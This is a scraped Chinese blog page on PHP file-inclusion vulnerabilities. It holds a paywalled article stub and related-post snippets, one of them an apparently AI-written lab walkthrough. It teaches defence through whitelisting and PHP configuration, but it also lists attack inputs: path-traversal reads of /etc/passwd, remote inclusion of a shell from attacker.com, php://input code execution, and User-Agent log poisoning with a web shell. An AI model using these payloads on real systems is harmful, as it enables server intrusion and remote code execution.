突破上传之文件包含漏洞以及修复方案

最新推荐文章于 2025-10-23 17:40:09 发布
原创 最新推荐文章于 2025-10-23 17:40:09 发布 · 7.8k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WEB渗透测试 #漏洞

这篇博客探讨了PHP的文件包含功能,包括include()、require()等语句的使用,以及本地和远程包含的概念。文章提到了利用WAF绕过安全防护,通过上传伪装的txt或jpg文件创建恶意小马文件的攻击方式。对于修复文件包含漏洞,建议采用白名单机制,限制可包含的文件类型,以防止攻击。

1.文件包含功能概述

对一个简单的 PHP 小程序来说,在不同的 PHP 脚本之间剪切或复制某一函数不是大问题, 但是当进入项目开发时,函数的数量将会变得相当庞大,并且函数具有较强的复杂性,这时你就会把它们保存到一个便于随时调用的函数库中,以便于该函数在整个项目中可以随时被调用。通常情况下这个函数库是一个文件,我们称为代码库。当为特定领域的功能编写函数时,希望通过把自定义的这些函数组织到一起,并存放到 单独的代码文件中。当团队开发项目时,如果有统一的通用函数文件,则将大幅缩短项目的开发周期,并使 得项目的层次结构分明。

2.常见包含语句

include() 只有代码执行到include()语句时才将文件包含进来,发生错误时只给出一个警告,向下执行

require() 程序一执行立即调用文件,如果发生错误,语句会输出错误信息,并终止脚本的运行。

include_once() 当重复调用同一文件时,程序只能调用一次。

require_once()同上

3.本地和远程包含

waf能够拦截我们上传的带有危险函数的php文件,所以我们需要将其改为其他格式上传,比如txt,jpg

txt的小马

最低0.47元/天 解锁文章
渗透测试之文件上传漏洞
weixin_45380284的博客
03-06 1970
文件上传漏洞 理论: 文件上传: 用户提交文件到web服务器。 文件上传本身没有问题,问题是文件被上传到哪里,上传之后,服务器如何处理、解释文件。 文件上传漏洞产生的原因; web服务器的文件上传功能在程序设计上的逻辑缺陷 web服务器无法区分识别上传文件的内容和格式 web服务器对文件上传的路径和位置控制不严格 服务器对所上传文件的读、写、执行、和所继承的权限设计不严格 文件上传检查不严 文件上传后修改文件名时处理不当 第三方插件的引入 文件上传漏洞入侵服务器的流程: 1.攻击者分析web站点是否存在缺陷
UEditor 任意文件上传漏洞
maverickpig的博客
05-06 2067
网络安全自学日志-漏洞复现篇:UEditor 任意文件上传漏洞 漏洞简介 漏洞描述 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。 影响范围 该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。 漏洞原理 漏洞的成因是在获取图片资源时仅检查了Conten
网络安全之文件上传漏洞(上篇)(技术进阶)
weixin_70911257的博客
04-26 2597
文件上传漏洞就是服务器端脚本没有对上传的文件进行严格的过滤和验证,导致黑客利用这个漏洞上传恶意脚本从而达到控制整个网站甚至是服务器。文件上传绕过方法不是一成不变的,我这里一关列举了一种方法,在熟练运用后会发现原来同一关可以有多个绕过方法,所以灵活运用晓其原理才能更好的玩转文件上传漏洞中篇下个星期一更!!
【网络安全】-文件包含漏洞-pikachu
weixin_65311462的博客
09-11 2568
文件包含漏洞是指程序在执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行使用,从而导致hacker可以利用这个漏洞包含恶意文件,执行任意代码进而访问敏感信息。1.本地文件包含漏洞与远程文件包含漏洞在防范措施上,两者都需要对用户输入进行严格的验证和过滤,但远程文件包含漏洞还需要特别注意禁用相关配置选项和限制外部资源的访问权限。
怕搞不懂 PHP 文件包含漏洞?一文讲清:原理 + 利用案例(含简单代码)+ 防御技巧,收藏这一篇足够!
最新发布
m0_59236602的博客
10-23 900
文件包含漏洞是PHP应用程序中常见的安全问题,当开发者使用包含函数引入文件时,如果传入的文件名参数未经严格校验,攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。
详解文件包含漏洞及其解决方法
2301_77004573的博客
04-29 2230
文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。注:(包含:程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写)例如我们在写c语言编程时的include就是个包含的应用。
ASP文件包含漏洞检测与修复方案
searchboy2025的博客
04-02 165
然而,随着ASP文件的广泛应用,也暴露出了一些潜在的安全隐患,其中之一便是包含漏洞的检测与修复问题。ASP文件包含漏洞是当前网络安全领域的一个重要问题,需要及时进行检测和修复。在未来的工作中,需要加强对网络安全的认识和防范能力,采取有效的措施进行防范和应对。ASP文件包含漏洞是指在使用ASP文件时,由于代码编写不当、安全配置不当等原因,导致该文件可能被恶意代码、恶意脚本等非法内容所包含,从而引发的一系列安全问题。同时,也需要定期对网站管理员和开发者进行安全知识和技能考核,确保其具备足够的安全防范能力。
文件包含漏洞概述、特征、利用条件、危害、防御、修复方法
白帽黑客八哥的博客
12-20 3021
文件包含漏洞(File Inclusion Vulnerability)是一种允许攻击者读取服务器上任意文件或目录内容的漏洞,从而可能泄露敏感信息,或允许攻击者构造恶意请求来执行任意代码。这是一个常见且危险的漏洞,在许多编程语言和框架中都可能存在。
文件上传漏洞修复方案
pygain的博客
10-22 2万+
现代互联网的web应用程序中,文件上传是一种常见的要求,因为它有助于一高业务效率。在大型社交网络程序中都支持文件上传功能。在博客,论坛,电子银行网络,会给用户和企业员工有效的共享文件。允许上传图片,视频,头像和许多其他类型文件。
Web安全之文件上传漏洞和案例示范
J老熊
09-09 1922
Web应用程序中,文件上传功能广泛应用,特别是在电商交易系统中,用户上传商品图片、订单文件等操作十分常见。然而,文件上传功能若未被妥善处理,将成为攻击者利用的突破口。本文将以电商交易系统为例,深入分析文件上传过程中的常见安全漏洞,提供相应的解决方案
文件包含漏洞
sunxingstar的博客
08-24 2057
主要包括本地文件包含LFI和远程文件包含RFI 两种形式。 文件包含攻击可能存在于WEB服务器源码里的inlcude()此类文件包含操作函数附近,通过客户端构造提交文件路径,是该 漏洞攻击成功的最主要原因。 常见的导致文件包含的函数  php: include(), include_once(), require(), require_once(), fopen(), readfile()… ...
超详细文件包含漏洞原理及修复
weixin_53519320的博客
11-17 4604
一、文件包含是什么 程序开发人员通常会把常用的可复性使用的函数写到一个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 (通俗的来说就是把文件放在一个文件夹下面然后使用的时候就可以直接调用) 文件包含原因 文件包含漏洞的原因? 随着网站业务的需求,程序开发人员一般希望代码更加灵活,所以将包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端也没有做合理的校验或者校验被绕过就照成了文件包含漏洞
任意文件包含漏洞
甲方乙方
07-27 6750
看我说web安全之文件包含     最近重点学的是web安全知识,“顺流而进,逆流而上”,那我就倒着总结下学的东西吧。。。
文件包含漏洞原理以及修复方法
it知识分享 free for nothing..
01-08 1352
文件包含漏洞原理以及修复方法
09_上传漏洞_文件包含&二次渲染&代码逻辑漏洞
qq_42171569的博客
06-26 1448
【本篇博客不对文件包含展开】正如前篇博客所述,白名单是一种极好的过滤方式,虽然php、asp代码中常常可以用00截断的方式绕过白名单过滤,但在服务器高版本的情况下,截断技术也会失效。那么这种情况下是否就没有思路进行渗透了呢?并不是,一种情况是出现了文件包含漏洞,也就是说这里上传的文件是合法的,但是其中含有恶意代码。存在文件包含漏洞漏洞前提下,合法文件可以通过某种方式作为脚本执行。当然本篇博客的内容重点不在于文件包含,安排这个板块的目的在于强调:漏洞的存在不是互斥的。因此,实战中对于漏洞的利用需要考虑“打组合
网站漏洞的查找利用解析漏洞来绕过上传
网站安全专家
09-23 741
在日常对客户网站进行渗透测试服务的时候,我们SINE安全经常遇到客户网站,app存在文件上传功能,程序员在设计开发代码的过程中都会对上传的文件类型,格式,后缀名做安全效验与过滤判断,SINE安全工程师在对文件上传漏洞进行测试的时候,往往发现的网站漏洞都是由于服务器的环境漏洞导致的,像IIS,apache,nginx环境,都存在着可以导致任意文件上传漏洞。 关于导致文件上传漏洞的产生以及测试...
文件包含漏洞(本地包含配合文件上传)
WYJ____的博客
08-06 2964
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会本地包含配合文件上传 实验工具 火狐浏览器 实验环境 客户机一台(操作系统为Windows Server 2003)服务器一台(操作系统为Windows Server 2003) 实验步骤 1、访问http://127.0.0....
文件上传漏洞总结(含原因+防御措施)+白名单+黑名单+内容、头+解析漏洞/修补方案
热门推荐
南部余额的博客
09-14 2万+
黑名单绕过: 特殊解析后缀,.htaccess解析,大小写绕过,点绕过,空格绕过,::$DATA绕过,双后缀名绕过; 白名单绕过: MIME绕过,%00截断,0x00截断,0x0a截断,内容及其他绕过?,文件头检测,二次渲染,条件竞争,突破getimagesize,突破exif_imagetype,*解析漏洞,IIS 6.0/7.X,IIS6.0目录解析,IIS6.0文件解析,IIS6.0默认解析,IIS7.0/7.5 PHP FastCGI解析,Apache后缀名解析,Nginx PHP CGI解析
iwebsec靶场文件包含漏洞
10-23
<think>嗯,用户这次在询问iwebsec靶场中文件包含漏洞的具体信息,包括原理、利用方法和解决方案。用户已经提供了两条引用信息,但主要涉及的是文件上传漏洞和JBoss漏洞,与当前问题关联不大。需要专注在文件包含漏洞本身。 首先回顾文件包含漏洞的基本原理。这种漏洞通常发生在PHP应用中,当开发者使用include、require等函数时,如果参数能被用户控制,攻击者就能通过路径遍历读取敏感文件或执行恶意代码。在iwebsec靶场中,应该会模拟这种场景让学习者练习。 关于利用方法,需要考虑几种常见类型:本地文件包含允许访问系统文件,比如/etc/passwd;远程文件包含则需要allow_url_include开启,可以加载外部恶意脚本。在靶场环境中,可能需要尝试不同路径遍历技巧,比如使用../突破目录限制,或者利用PHP伪协议如php://filter来读取源码。 解决方案方面,应该强调输入验证的重要性。开发者必须严格检查包含文件的路径参数,禁止用户输入绝对路径或特殊字符。也可以配置PHP环境关闭危险功能,比如设置allow_url_include=Off。靶场练习时可能还需要演示如何修复漏洞代码。 注意到用户引用的资料提到1098等端口,但这些其实是JBoss漏洞的默认端口,与文件包含无关。用户可能之前混淆了漏洞类型,需要明确区分开。iwebsec作为综合靶场应该包含多种漏洞场景,用户现在聚焦的是文件包含这一特定模块。 最后考虑生成相关问题时要针对性设计:文件包含的防御措施可以作为一个重点问题;另外靶场实操技巧也值得探讨,比如如何绕过某些过滤规则;还可以比较不同伪协议的应用场景。这些问题能帮助用户深入理解漏洞本质。 </think>以下是iwebsec靶场中**文件包含漏洞**的原理、利用方法及解决方案的详细说明: --- ### **一、漏洞原理** 文件包含漏洞(File Inclusion Vulnerability)主要源于动态包含文件时未对用户输入的路径进行严格过滤。在PHP中常见的包含函数如`include()`、`require()`等,若开发者未验证用户控制的参数(如`?file=xxx`),攻击者可构造恶意路径实现: 1. **本地文件包含(LFI)** 读取服务器敏感文件(如`/etc/passwd`、配置文件、源码): ``` http://target.com/index.php?file=../../../../../etc/passwd ``` 2. **远程文件包含(RFI)** 当`allow_url_include=On`(PHP配置)时,包含远程服务器上的恶意脚本: ``` http://target.com/index.php?file=http://attacker.com/shell.txt ``` 3. **利用伪协议** 如`php://filter`读取源码(Base64编码防解析): ``` http://target.com/index.php?file=php://filter/convert.base64-encode/resource=index.php ``` --- ### **二、iwebsec靶场利用方法** 靶场环境通常模拟以下场景: 1. **基础LFI利用** 通过参数遍历目录读取`/flag`或配置文件: ```url /index.php?filename=../../../../var/www/html/flag.php ``` 2. **日志注入** 包含访问日志(如`/var/log/apache2/access.log`),注入PHP代码到User-Agent头,再包含日志执行代码。 3. **PHP伪协议利用** - 读取源码:`?file=php://filter/read=convert.base64-encode/resource=config.php` - 执行代码:`?file=php://input` + POST体:`<?php system("id");?>` 4. **文件上传组合利用** 结合文件上传漏洞上传图片马后包含执行:`?file=./uploads/shell.jpg` --- ### **三、解决方案** 1. **输入验证与过滤** - 禁止用户输入包含路径遍历字符(`../`、`..\`)或绝对路径 - 白名单限制允许包含的文件名(如只允许`homepage.php`、`contact.php`) ```php $allowed_files = ["home.php", "about.php"]; if (in_array($_GET['file'], $allowed_files)) { include($_GET['file']); } ``` 2. **关闭危险配置** 修改`php.ini`: ```ini allow_url_include = Off allow_url_fopen = Off ``` 3. **使用硬编码或映射** 避免直接使用用户输入作为包含路径: ```php $page = $_GET['page']; $safe_pages = [ 'home' => 'home.php', 'about' => 'about.php' ]; include($safe_pages[$page] ?? 'default.php'); ``` 4. **设置目录限制** 限定文件包含的根目录: ```php $base_dir = '/var/www/safe_dir/'; $file = basename($_GET['file']); // 移除路径 include($base_dir . $file); ``` --- ### **漏洞复现示例(iwebsec靶场)** 1. 访问存在漏洞的URL:`http://target/vul?file=../../../../etc/passwd` → 返回系统用户列表 2. 包含日志文件: - 修改请求头:`User-Agent: <?php system($_GET['cmd']);?>` - 包含日志:`?file=/var/log/apache2/access.log&cmd=id` → 执行系统命令 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值